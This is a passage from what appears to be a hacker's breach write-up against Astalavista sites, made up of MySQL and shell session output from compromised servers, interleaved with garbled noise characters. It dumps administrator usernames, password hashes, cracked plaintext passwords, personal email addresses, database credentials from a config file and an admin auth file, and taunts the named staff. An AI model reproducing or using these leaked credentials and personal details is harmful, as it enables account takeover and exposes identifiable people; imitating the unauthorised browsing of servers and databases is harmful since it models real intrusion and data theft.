- \$ C4 H6 J1 f| contrexx_module_contact_form                     |
| contrexx_module_contact_form_data                |
| contrexx_module_contact_form_field               |
| contrexx_module_contact_settings                 |
| contrexx_module_data_categories                  |
| contrexx_module_data_message_to_category         |
| contrexx_module_data_messages                    |
| contrexx_module_data_messages_lang               |
| contrexx_module_data_placeholders                |
| contrexx_module_data_settings                    |
| contrexx_module_directory_access                 |
# W9 }& N% Q. P2 N: Z| contrexx_module_directory_categories             |
| contrexx_module_directory_dir                    |
| contrexx_module_directory_inputfields            |
| contrexx_module_directory_levels                 |
| contrexx_module_directory_mail                   |
3 [2 D/ B1 I/ |8 f' L| contrexx_module_directory_rel_dir_cat            |
; f/ n' w! @1 O0 F| contrexx_module_directory_rel_dir_level          |
| contrexx_module_directory_settings               |
' S& n; N+ m0 ~& E: w* ]; _| contrexx_module_directory_settings_google        |
| contrexx_module_directory_vote                   |
+ Y$ P% h! |" y8 C' z| contrexx_module_docsys                           |
| contrexx_module_docsys_categories                |
| contrexx_module_egov_configuration               |
| contrexx_module_egov_orders                      |
) `: y: ]. k. o) x* G| contrexx_module_egov_product_calendar            |
| contrexx_module_egov_product_fields              |
| contrexx_module_egov_products                    |
4 S- U  l7 f6 T. a| contrexx_module_egov_settings                    |
+ H% F: h7 g% ]| contrexx_module_exploits                         |
) Z8 E' k' P; T  G0 n! [' D| contrexx_module_exploits_categories              |
3 U- e) t. {7 T+ {( ~' e| contrexx_module_feed_category                    |
| contrexx_module_feed_news                        |
| contrexx_module_feed_newsml_association          |
3 F3 H- I6 i2 q4 R' ~" c3 x| contrexx_module_feed_newsml_categories           |
2 V/ i& _8 C1 C, ?1 b  L$ T; ^3 b| contrexx_module_feed_newsml_documents            |
| contrexx_module_feed_newsml_providers            |
| contrexx_module_forum_access                     |
| contrexx_module_forum_categories                 |
1 `: T" a' ~7 S: J" d# s' Q| contrexx_module_forum_categories_lang            |
| contrexx_module_forum_notification               |
| contrexx_module_forum_postings                   |
7 w7 ?% t9 x9 h2 j| contrexx_module_forum_rating                     |
3 h4 [: D, N8 o# r" F| contrexx_module_forum_settings                   |
| contrexx_module_forum_statistics                 |
$ o) `# t  e7 w9 n1 @/ G| contrexx_module_gallery_categories               |
| contrexx_module_gallery_comments                 |
| contrexx_module_gallery_language                 |
+ z; T% D% _( |( s3 `| contrexx_module_gallery_language_pics            |
| contrexx_module_gallery_pictures                 |
. l1 o. V' q, A' \0 h9 u2 s| contrexx_module_gallery_settings                 |
| contrexx_module_gallery_votes                    |
4 [8 D9 E. c/ J$ @/ ~5 v5 z| contrexx_module_guestbook                        |
| contrexx_module_guestbook_settings               |
| contrexx_module_livecam                          |
& y/ Q; T. M. S* {| contrexx_module_livecam_settings                 |
& d8 E9 e, W) m9 o; X& y| contrexx_module_market                           |
: _5 z0 u9 C7 b, {5 B| contrexx_module_market_access                    |
| contrexx_module_market_categories                |
2 h& X$ G1 M* X$ R9 ]/ a+ d8 O| contrexx_module_market_mail                      |
' e0 Q% j7 Z2 b0 || contrexx_module_market_paypal                    |
& _5 h2 q6 t* G4 |: N7 O, w6 {| contrexx_module_market_settings                  |
| contrexx_module_market_spez_fields               |
| contrexx_module_mediadir_access                  |
4 m1 ?% _6 J6 s' K- K' v| contrexx_module_mediadir_categories              |
# k7 n9 H9 N6 `8 {) t- @1 O| contrexx_module_mediadir_comments                |
| contrexx_module_mediadir_dir                     |
% T+ V( J# X6 I7 M| contrexx_module_mediadir_inputfields             |
| contrexx_module_mediadir_levels                  |
7 p# F! G: S9 T$ }| contrexx_module_mediadir_mail                    |
" A# F7 h2 f- u1 l+ t) p1 ?| contrexx_module_mediadir_rel_dir_cat             |
& a6 u* y  v- d5 b| contrexx_module_mediadir_rel_dir_level           |
| contrexx_module_mediadir_reports                 |
| contrexx_module_mediadir_settings                |
| contrexx_module_mediadir_settings_google         |
1 y! L) [: i) z* h| contrexx_module_mediadir_vote                    |
4 ~8 K1 g5 }% U! x" O6 N( X; d| contrexx_module_memberdir_directories            |
" w7 O# p# r* z9 _- }| contrexx_module_memberdir_name                   |
* l4 [# f" ?* z: L1 ]| contrexx_module_memberdir_settings               |
| contrexx_module_memberdir_values                 |
# e8 L: F# [9 c! M| contrexx_module_nettools_allowed_groups          |
| contrexx_module_nettools_settings                |
| contrexx_module_news                             |
/ I5 Y- B% v) J8 U9 N# s| contrexx_module_news_access                      |
| contrexx_module_news_categories                  |
5 o- s$ Q' D$ B2 ~% C% Q* M| contrexx_module_news_settings                    |
| contrexx_module_news_teaser_frame                |
| contrexx_module_news_teaser_frame_templates      |
0 e4 Z# n' B7 C9 }| contrexx_module_news_ticker                      |
| contrexx_module_newsletter                       |
; i. Q& S/ p3 s8 i| contrexx_module_newsletter_attachment            |
% v* q. D7 b9 K: }1 b6 J+ i+ z; M| contrexx_module_newsletter_category              |
| contrexx_module_newsletter_confirm_mail          |
' Q0 g! I1 ]: s' n| contrexx_module_newsletter_rel_cat_news          |
| contrexx_module_newsletter_rel_user_cat          |
| contrexx_module_newsletter_settings              |
- R2 h, p) ], g0 W| contrexx_module_newsletter_template              |
| contrexx_module_newsletter_tmp_sending           |
2 L! }& b  Z+ K5 i6 c1 q| contrexx_module_newsletter_user                  |
| contrexx_module_newsletter_user_title            |
1 G8 w- S! v  X" H/ a- ^| contrexx_module_onlinetools_defaultports         |
| contrexx_module_onlinetools_defaultports_back    |
| contrexx_module_onlinetools_geolitecity_blocks   |
| contrexx_module_onlinetools_geolitecity_country  |
# m0 M5 j( \+ [, z| contrexx_module_onlinetools_geolitecity_location |
| contrexx_module_podcast_category                 |
| contrexx_module_podcast_medium                   |
) r& X* _% }' ^1 D9 y7 @| contrexx_module_podcast_rel_category_lang        |
| contrexx_module_podcast_rel_medium_category      |
| contrexx_module_podcast_settings                 |
| contrexx_module_podcast_template                 |
| contrexx_module_proxydb                          |
| contrexx_module_recommend                        |
| contrexx_module_repository                       |
& X* u% o6 {! q% L| contrexx_module_securitynews_cats                |
7 i8 |8 [& K% N| contrexx_module_securitynews_feeds               |
& L6 f. G3 _+ c0 z0 P| contrexx_module_securitynews_news                |
| contrexx_module_shop_categories                  |
| contrexx_module_shop_config                      |
| contrexx_module_shop_countries                   |
| contrexx_module_shop_currencies                  |
| contrexx_module_shop_customers                   |
| contrexx_module_shop_importimg                   |
| contrexx_module_shop_lsv                         |
| contrexx_module_shop_mail                        |
| contrexx_module_shop_mail_content                |
- N' b; Q* g5 S( }| contrexx_module_shop_manufacturer                |
| contrexx_module_shop_order_items                 |
9 {5 v# c% a0 G) t# M" a  i| contrexx_module_shop_order_items_attributes      |
( ~1 L" g  L1 K/ L| contrexx_module_shop_orders                      |
! e+ Z3 b9 ^; Z0 F' y| contrexx_module_shop_payment                     |
| contrexx_module_shop_payment_processors          |
4 @* r9 X* z$ e* Q6 F| contrexx_module_shop_pricelists                  |
! q+ `/ Q! G7 _+ p| contrexx_module_shop_products                    |
| contrexx_module_shop_products_attributes         |
0 A$ ^9 d% I: z9 h+ |9 C' @: o| contrexx_module_shop_products_attributes_name    |
| contrexx_module_shop_products_attributes_value   |
0 ]+ m: R$ T# J4 q2 Q  z/ B  || contrexx_module_shop_products_downloads          |
- m! E+ K, @6 h, s. E| contrexx_module_shop_rel_countries               |
| contrexx_module_shop_rel_payment                 |
| contrexx_module_shop_rel_shipment                |
| contrexx_module_shop_shipment_cost               |
- o# X) \" J- I3 [/ @5 v' y| contrexx_module_shop_shipper                     |
2 X$ l  ^' V5 U) J2 e3 t$ l| contrexx_module_shop_vat                         |
( F9 ]+ x8 n, n% m# W9 C6 O4 h| contrexx_module_shop_zones                       |
" Q& F. t/ O3 f# T+ Z| contrexx_module_u2u_address_list                 |
0 i$ m& x, Q% j8 Q( b| contrexx_module_u2u_message_log                  |
| contrexx_module_u2u_sent_messages                |
) J5 N9 X/ C) l; ~9 k# y| contrexx_module_u2u_settings                     |
% A+ S+ J6 Q0 e5 T7 O: f| contrexx_module_u2u_user_log                     |
| contrexx_modules                                 |
| contrexx_sessions                                |
! d% a% T$ a4 `* w; P8 F2 w2 O| contrexx_settings                                |
| contrexx_settings_smtp                           |
| contrexx_skins                                   |
! U+ r+ D* n" g' C$ z| contrexx_stats_browser                           |
$ y# A& W: C( l( E| contrexx_stats_colourdepth                       |
| contrexx_stats_config                            |
" Z7 k, R( R9 L" w# z| contrexx_stats_country                           |
| contrexx_stats_hostname                          |
5 n8 R: _9 i3 q: D  `| contrexx_stats_javascript                        |
8 L9 e% L3 d1 F| contrexx_stats_operatingsystem                   |
: h) }6 R! p/ y3 N| contrexx_stats_referer                           |
| contrexx_stats_requests                          |
0 w1 @8 q, q/ [2 @5 _0 Z$ o| contrexx_stats_requests_summary                  |
% Y8 \7 f5 X3 j- t( G| contrexx_stats_screenresolution                  |
+ V* g3 Z( H, S6 J| contrexx_stats_search                            |
| contrexx_stats_spiders                           |
4 R  V( R- D5 |% K8 i| contrexx_stats_spiders_summary                   |
| contrexx_stats_visitors                          |
| contrexx_stats_visitors_summary                  |
0 ]+ f7 S& o6 z: j  w4 y0 u% g  P- B| contrexx_voting_additionaldata                   |
| contrexx_voting_email                            |
| contrexx_voting_rel_email_system                 |
| contrexx_voting_results                          |
6 H& a3 A) E) d3 n9 z5 S/ q! U| contrexx_voting_system                           |
| foo                                              |
+————————————————–+
227 rows in set (0.01 sec)
  J) e  F+ f* o- o; f3 K
  N: r  {; j6 [; ]# z# Emysql> select count(*) as skids from contrexx_access_users;
+——-+
| skids |
+——-+
2 O. `! o/ v3 a" C! l7 P3 f& w4 H| 53699 |
( j2 T; t9 X% L5 q: k1 K+——-+
1 row in set (0.00 sec)
- l! \) `( O' C& T4 X# b( U
; }6 I9 i) D+ G- Bmysql> describe contrexx_access_users;
4 K  C; Q+ l, s. ?6 e+——————+——————————————+——+—–+————–+—————-+
| Field            | Type                                     | Null | Key | Default      | Extra          |
9 B% @# V- c  S$ j9 \) X: G+——————+——————————————+——+—–+————–+—————-+
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |
) X8 e+ s7 q, o% w" `| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |
. `) F0 c5 |1 Q1 s/ d| username         | varchar(40)                              | YES  | MUL | NULL         |                |
5 ^! V9 \' d: s4 B% \1 n! A6 V/ T! r| password         | varchar(32)                              | YES  |     | NULL         |                |
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
| validity         | int(10) unsigned                         | NO   |     | 0            |                |
4 H6 e7 q4 \; ~0 B& j| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
( V" ~) O) K* a3 Y' F( T4 n' d| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
| email            | varchar(255)                             | YES  |     | NULL         |                |
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
; z% w" n- H4 B| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
+ }  I% u$ }4 I5 H/ s9 B| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
6 i2 M- |  j  p1 g: c! n) q# g| active           | tinyint(1)                               | NO   |     | 0            |                |
| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
  p7 s- r/ D7 n( t% {. j) N/ E| restore_key      | varchar(32)                              | NO   |     |              |                |
7 a) J, @, n* k/ c| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |
+——————+——————————————+——+—–+————–+—————-+
18 rows in set (0.00 sec)
5 G" D1 D# M+ _, A! q
  T; b+ g" U3 B; f% zmysql> select username,password,email from contrexx_access_users where is_admin = 1;
+————+———————————-+—————————–+
| username   | password                         | email                       |
+————+———————————-+—————————–+
| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
' h4 X$ l: b+ D! C$ t| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |
2 b, p# l7 ^0 t. W  s' r+————+———————————-+—————————–+
7 \8 r6 }" g; \. g) n* d' g6 }4 rows in set (0.04 sec)

+ f7 x' v9 H) }" f  Bmysql> exit;
Bye
6 H  M4 J) t# U/ y  K' w- `0 @, V
[~] There you go, your “team of security and IT professionals” is a joke.
9 R! j1 k4 W9 k
+——————————+
system:f82BN3+_*
Be1er0ph0r:belerophor4astacom
prozac:asta4cms!
commander:mpbdaagf6m
sykadul:ak29eral
+——————————+

% @( g8 M3 u% m5 d[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
# q$ _1 C. \- Z4 c/ I- S; w6 U…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
+ P  J- a6 j% a
& N' t9 L% g8 l9 I6 y[~] Lets move to astalavista.net now,

$ J* A# f7 x0 AFrom <链接标记[url]https://www.astalavista.net/[/url]>:
" V1 i% ?, Z: t3 V1 e/ c. m8 W>> Everyone knows that the best defense is a good offense.
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
) Q+ \( J% r( D6 V0 Z, W>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
1 ~2 ~/ B; E1 j5 e" l7 o, E
( V3 z  t: O3 J5 j/ h8 Q>> Go ahead, try and hack our server . in a completely legal way!
>> Learn by doing: We offer our members tricky tasks and challenges on an
; C! |2 y. y- @>> ongoing basis so you can test your knowledge and abilities. You can also
# I" [& v6 Z' N, q' e' I>> demonstrate what you.ve mastered by taking part in regular hacker contests
' R5 @2 L& d5 a' ]4 R>> and war games

[~] Lets take a look there, after all… they are hack-proof, aren’t they?!

[-] Tricky task: Find home dir of astalavista.net
- g  p, X9 k2 J2 z( p3 p. S3 [
sh-3.2$ ls -la ~astanet
total 48
$ V% C) y  a! l% ^drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
6 ~4 E0 t3 j* ]& u3 Q7 adrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
5 G0 A" t' Z5 s# i! p-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
5 G! N# O' M, Q7 y5 s) ]0 ]& \7 o-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
5 U4 u4 F6 n/ `& Vdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
3 K/ u4 i  r1 n) klrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
+ X2 F4 A' n9 N0 \) B0 N1 ^" f# {6 R-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow

/ v5 i& o3 d. _! y% i4 osh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
+ ^  s5 j$ {. M, psh-3.2$ ls -la
total 200
* ?( U# B. c$ ?5 z5 p* ?drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
, O8 k0 B$ F& H4 J% Hdrwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
$ C) A* B1 Y- o3 k. D  \$ v; rdrwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com
drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
3 s3 x' T$ L& Idrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
0 P7 Y% B: L! O- g6 c' D-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico
2 s! i) l; Z# G& M5 d1 i) mdrwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
: o0 r7 G3 t6 ~+ ~: {drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess
: k# o, q. [# G4 Q-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php
-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html
- ?+ \4 L6 a6 h' Q-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php
& T# v* X, [, o2 ~! X-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf
. O+ `' _8 i1 E& h2 M1 jdrwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
# X0 n# ^; D9 ?$ ?) T0 kdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
" ?5 L5 V) j) Q0 l6 Z5 D6 bdrwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
# ]( ?: k7 O* }9 `2 Hdrwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
* G! A/ f# D5 i! adrwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com
9 T" u! ^+ i5 rdrwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
3 ?3 v  k2 w6 z+ f' xdrwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
3 l% Y8 l5 ]* @" H+ W" t' _3 v# A
2 a1 Z) G, v& T1 S# x8 o" @sh-3.2$ head -20 index.php
<?PHP
/**
0 N$ E. f0 @( S3 a9 |* Mainfile (external) for astalavistaNET v2.0
, ^3 K% @5 K/ e6 V( C  ]*
4 c1 P% X: x9 o7 a2 n7 t8 \* @copyright     Astalavista IT Engineering GmbH
' }) r+ V5 s8 E" g$ q( `* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
* @version       1.0
*/
9 K5 M& ~% H8 u0 h/ E0 S. h# D
+ w8 U- c( X0 t# }% o        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
6 n4 s" a0 c: P: ^                $dontStartSession = false;
. e5 J( X0 R  t+ U        } else {
                $dontStartSession = true;
        }
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
5 C1 ?, V4 B* u' B! V- G" t        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
$ a& H# F  _2 c: F3 S8 S        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
& z# l9 _% U: R0 `
sh-3.2$ cd config
  a' l- W5 C# F, Vsh-3.2$ ls -la
2 W8 C$ ]& I8 @+ Ztotal 32
4 h6 f6 m4 k4 j3 J( z8 ^4 Qdrwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
; L* W; ?& e' D" r: K! c, _- q- Adrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
7 W/ Y: n3 {3 l9 r( K-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php
7 r+ Q& R/ o/ s: f5 s-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
0 s5 F, A9 o' Z3 a
sh-3.2$ cat com.conf.php
5 O0 Q6 g: J3 D0 l6 e[snip]
* T8 i4 `0 f8 \1 w) k  x//member-database
$_CONFIG['db_mem_server']       = ‘localhost’;
" o2 {& @# ~7 _3 V' [" N" a, i% H4 i$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
0 e5 N5 g  Z7 p5 D) U5 p$_CONFIG['db_mem_user']         = ‘astanet_db’;
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
# Y6 R" G: w' Y( }$_CONFIG['db_mem_debug']        = false; //true or false
+ @+ c& F+ d% g/ A* A# f; O) A//ads-database
2 K( F% l2 E5 V- ?! a8 Q2 i# g* h$_CONFIG['db_ads_server']       = ‘localhost’;
9 Y, u- J3 C% S7 N8 L$ e( b$_CONFIG['db_ads_database'] = ‘astanet_ads’;
$_CONFIG['db_ads_user']         = ‘astanet_db’;
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
$_CONFIG['db_ads_debug']        = false; //true or false
//rainbow-database
6 x  ~2 p! {% ^/ q+ e  @$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;
0 [, F3 x& N+ _$_CONFIG['db_rainbow_database'] = ‘rainbow’;
$_CONFIG['db_rainbow_user']     = ‘dinu’;
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
$_CONFIG['db_rainbow_debug']    = false; //true or false
//mailing lists database
3 P+ F( Q; H" l% W8 n$_CONFIG['db_mailing_lists_server']     = ‘localhost’;
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;
+ m0 L- [+ {/ K9 J# c2 R/ s, W9 N$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;
* N. s& i8 {8 F2 e. h& w$_CONFIG['db_mailing_lists_debug']              = false; //true or false
2 ?% b" q  x" a3 [1 V. p- {" ~) [//paypal
% a! v: S, }0 `8 ]$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
1 h1 j  V/ c" P+ L1 k+ w- V$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
* ?, ^/ d& m+ r" [* |% S# i$_CONFIG['sub_pp_noship']       = ‘1′;
7 J/ M% d. q& Y$ e7 k$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;
4 |/ `+ c2 O0 M- U) e[snip]

sh-3.2$ cd ..
; R! g1 f2 N% ?$ P+ ^+ V& c  wsh-3.2$ cd member
sh-3.2$ ls -la
1 o" h- U, \4 F! b* {( c- vtotal 20
drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
" I; x# M$ Q7 a) i( i2 Fdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
2 a/ A3 _6 D" c1 a$ p-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
sh-3.2$ cat .htaccess
5 K. J& o8 F5 z$ YSecFilterEngine off
& D& N. ]. C7 ~& ~
sh-3.2$ cd ..
+ W& s. ?$ h" esh-3.2$ cd cron
& S- r, G( Z/ s" \( h) ksh-3.2$ ls -la
total 168
4 e& a2 `* x: ~  |; ^# Bdrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
# _& V4 j- n8 v" b+ Cdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
0 r: o( s" a7 p: s+ d-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
) h' \* w& H& n9 \-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
" x9 ^1 I9 P0 A) v-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
. E$ S, T/ |2 t$ l! F- m0 M-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
6 _1 e0 o! ^% y; A6 T-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
0 A' y% G# `! @- S-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
. t% T1 `# Y- F% Z1 o! p5 w-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
& i  L) L. W+ U-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
7 B7 y- }1 J, `( t9 a; sdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php

sh-3.2$ cd ..
+ Y" Y7 B% D: Y% F5 y* bsh-3.2$ cd _007
4 u  G; D4 J: Q/ Q& Y* T* Tsh-3.2$ ls -la
total 24
0 v& J2 {9 p4 X3 w/ Ldrwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
+ a$ b) {2 b8 Q( R6 @5 \-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
& ?( V+ F, `8 P, r-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
+ ?# M, Y: J6 F: X7 f2 F' C& L# tdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
" F  g+ F+ }1 h
' v5 u! L" V- b3 Gsh-3.2$ cat  .htaccess
authType Basic
authName Admin
! S' n, F5 _3 }% |authUserFile /home/astanet/auth/.htadm_pwd
8 A9 M. r2 i( b0 r' f1 n# trequire valid-user
8 I5 H% E& ?* }; d
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
1 A8 S' }4 y$ H) }0 m5 n( p- s# madmin2net:CR0bl65MwhfT
4 w2 k: b5 ^6 o) x" P
sh-3.2$ mysql -u astanet_db -p
& x' Z& u- a, D. y6 IEnter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
& d! L( s, u" Z$ E, P8 G$ Y1 W& r/ {( bYour MySQL connection id is 275153
0 O, F% c' V2 m9 xServer version: 5.0.45-community-log MySQL Community Edition (GPL)
  g* F+ Q, W9 V8 j5 N
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
9 o+ I- y0 v# X8 `" |
mysql> show databases;
3 t3 l7 z5 O+ A3 G+ W8 j+———————–+
* ]' V, h5 d" C7 l- T/ O8 t  F| Database              |
+———————–+
/ d* z9 h; W' a5 i+ D| information_schema    |
! g1 O% W1 }" k3 d# g3 A3 c' O| astanet_ads           |
| astanet_mailing_lists |
| astanet_mediawiki     |
: S4 ^' Y7 L: f| astanet_membersystem  |
! h# g( y5 W6 l8 n% o' R) v| test                  |
+———————–+
6 rows in set (0.00 sec)

mysql> use astanet_membersystem
Database changed
mysql> show tables;
% B$ t3 C5 p0 N* K! F. {5 q9 F' _+———————————–+
' d' N' V. M" X, O7 r$ ^/ x0 x* R| Tables_in_astanet_membersystem    |
. X# Q- F$ |: P+ |+———————————–+
0 H2 d1 S) l: S8 l| blacklist_categories              |
% k) ]9 j. D0 m/ Z& b| blacklist_content                 |
| blacklist_levels                  |
| blacklist_mcset                   |
| dir_categories                    |
| dir_comments                      |
| dir_links                         |
| dir_temp                          |
| dir_votes                         |
| documents                         |
7 e. l6 X5 |7 X* `- _! O" K| documents_categories              |
6 e7 i  h7 s4 ~" ~6 k9 l% X| email_content                     |
| email_settings                    |
2 K) N6 l7 L: h8 _| exploits                          |
| exploits_categories               |
& J# c7 f* x3 F$ k- y$ s| exploittree_categories            |
| exploittree_exploits              |
| home_values                       |
6 j2 t' x; c8 j& x! D9 a4 ~| iso_countries                     |
+ f. t/ w& F; ~7 T| links_categories                  |
| links_records                     |
% b: r# m5 q& W! }, d| links_unauth                      |
